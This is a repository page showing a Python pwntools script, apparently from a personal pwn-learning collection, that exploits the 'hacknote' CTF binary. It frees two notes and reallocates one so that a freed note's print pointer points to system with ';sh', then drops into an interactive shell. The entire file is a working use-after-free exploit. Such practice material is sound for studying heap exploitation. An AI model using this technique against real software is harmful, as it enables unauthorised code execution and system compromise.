bjrjk/pwn-learning
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
07817c40c578f72f9b88eb784caff097f7b25354
pwn-learning/UAF/hacknote/shell.py
Jack Ren 1d1b1ffec2 Updated UAF/hacknote
2022-01-27 15:53:37 +08:00

50 lines
1.1 KiB
Python
Raw Blame History

#!/usr/bin/env python2
from pwn import *
from LibcSearcher import *
from struct import pack
import os, base64, math, time
context(arch = "i386", os = "linux", log_level = "debug")
def note_add(p, size, content):
p.recvuntil('Your choice :')
p.sendline('1')
p.recvuntil('Note size :')
p.sendline(str(size))
p.recvuntil('Content :')
p.send(content)
def note_delete(p, index):
p.recvuntil('Your choice :')
p.sendline('2')
p.recvuntil('Index :')
p.sendline(str(index))
def note_print(p, index):
p.recvuntil('Your choice :')
p.sendline('3')
p.recvuntil('Index :')
p.sendline(str(index))
p = process('./hacknote')
elf = ELF('./hacknote')
gdb_command = """
#b *0x80486ca
#b *0x8048893
#b *0x80488a9
#b *0x804875c
#b *0x804896C
"""
system_addr = elf.plt['system'] + 0x6
# gdb.attach(p, gdb_command)
note_add(p, 100, "/bin/sh\x00")
note_add(p, 100, "/bin/sh\x00")
note_delete(p, 0)
note_delete(p, 1)
note_add(p, 8, p32(system_addr) + ";sh\x00")
note_print(p, 0)
p.interactive()
Reference in New Issue View Git Blame Copy Permalink